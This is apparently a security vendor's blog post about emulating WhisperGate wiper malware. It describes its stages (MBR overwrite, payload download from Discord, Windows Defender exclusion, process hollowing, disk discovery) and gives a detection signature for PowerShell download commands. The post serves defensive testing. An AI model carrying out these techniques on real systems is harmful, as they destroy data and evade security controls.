WhisperGate is a type of destructive malware first identified in January 2022, primarily linked to cyberattacks targeting Ukraine. Initial analysis of this malware was published in the joint advisory AA22-057A on February 26, 2022, detailing its behavior and impact. More recently, further insights into the threat were provided in the Cybersecurity Advisory (CSA) AA24-249A, released on September 5, 2024, highlighting its continued relevance and the evolving nature of this threat.

WhisperGate mimics some behaviors of traditional ransomware, but it does not provide any decryption or recovery method to restore the files, proving its intent to cause irreversible damage rather than pursuing financial gain. Its deployment during attacks on Ukraine suggests it was part of a broader effort to disrupt critical infrastructure during heightened geopolitical tensions, marking it as a potent weapon for state-sponsored attacks aimed at destabilization.

On September 10, 2024, AttackIQ responded to the CSA AA24-249A with a new assessment template. Building on this, AttackIQ has now released additional content that expands on the behaviors exhibited by WhisperGate malware. This includes a new attack graph designed to help customers validate their security controls and assess their ability to defend against this threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against destructive threats.
• Assess their security posture against the Tactics, Techniques and Procedures (TTPs) exhibited by Whisper Gate.
• Continuously validate detection and prevention pipelines on Windows environments.

WhisperGate – 2024-09 – Associated Tactics, Techniques, and Procedures (TTPs)

This attack graph is based on the Cybersecurity Advisory (CSA) released by Cybersecurity and Infrastructure Security Agency (CISA), alongside multiple partners, that outlines activities carried out by cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155), who have begun deploying the destructive WhisperGate malware.

This attack graph consists of a multi-stage approach with an initial set of malicious payloads that overwrites the Master Boot Record (MBR) and displays a fake ransom note. Then, WhisperGate retrieves additional payloads from Discord to perform further actions on the objective. It then adds a directory to the Windows Defender exclusion list to avoid detection and performs system discovery to collect information on physical disks and the file system.

Initial Access – Malware Delivery

This stage focuses on the deployment of two malicious payloads into the system. The first, BootPatch, overwrites the Master Boot Record (MBR) and displays a fake ransom note. The second, WhisperGate, retrieves an additional payload from a Discord server. Afterward, a Base64 encoded PowerShell command is executed, causing the system to sleep for 10 seconds to evade detection.

Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious content.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell’s -encodedCommand parameter.

Execution – Additional Payload Deployment

In this stage, additional payloads are deployed into the system. First, a reversed payload is downloaded. After reversing its bytes, the payload uses reflective loading to place a Dynamic-Link Library (DLL) directly into memory. Finally, a Visual Basic Script (VBS) file is dropped onto the system to execute further actions.

Reflective Code Loading (T1620): This scenario takes a default AttackIQ DLL and loads it into the memory space of its own process in order to execute the desired DLL function.

Discovery & Defense Evasion – Evade Windows Defender

In this stage, WhisperGate adds a directory path to the Windows Defender exclusion list. Then, a payload is loaded via process hollowing in the context of the InstallUtil process. Finally, a discovery routine is executed to gather information about the system’s physical disks and file system.

Impair Defenses: Disable or Modify Tools ( T1562.001 ): This scenario uses the Add-MpPreference cmdlet to add the %TEMP%\aiq-temp-exclusion\ directory path to the Windows Defender exclusion list.

Process Injection: Process Hollowing ( T1055.012 ): This scenario creates a process in a suspended state and unmaps its memory, which is then replaced with the contents of a malicious executable. This technique allows the malicious code to be executed while being masked as a legitimate process.

Peripheral Device Discovery ( T1120 ): This scenario retrieves information about the system’s physical disks using the GetLogicalDrives API call.

Peripheral Device Discovery ( T1120 ): This scenario retrieves information about the system’s physical disks using the GetDriveTypeW API call.

File and Directory Discovery ( T1083 ): This scenario will call the FindFirstFileW and FindNextFileW Windows API to perform the enumeration of the file system.

Detection and Mitigation Opportunities

With so many different techniques being used by threat actors, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1.Process Injection: Process Hollowing (T1055):

Malware will commonly inject malicious code into legitimate suspended and hollowed processes to attempt to blend in with legitimate applications to remain hidden and appear normal to the compromised system.

1a. Detection

Searching for common processes that are performing uncommon actions can help identify when a process has been compromised.

1b. Mitigation

MITRE ATT&CK recommends the following mitigation recommendations:

• M1040 – Behavior Prevention on Endpoint

2. Ingress Tool Transfer (T1105):

Adversaries often rely heavily on downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

2a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

• M1031 – Network Intrusion Prevention

3. Reflective Code Loading (T1620):

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk

3a. Detection

Monitor for artifacts of abnormal process execution or code artifacts associated with reflectively loading code, such as the abuse of .NET functions like Assembly.Load() or Native API functions like CreateThread(), memfd_create(), execve(), and/or execveat()

3b. Mitigation

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Wrap Up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against WhisperGate. With data generated from continuous testing and the use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and persistent threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.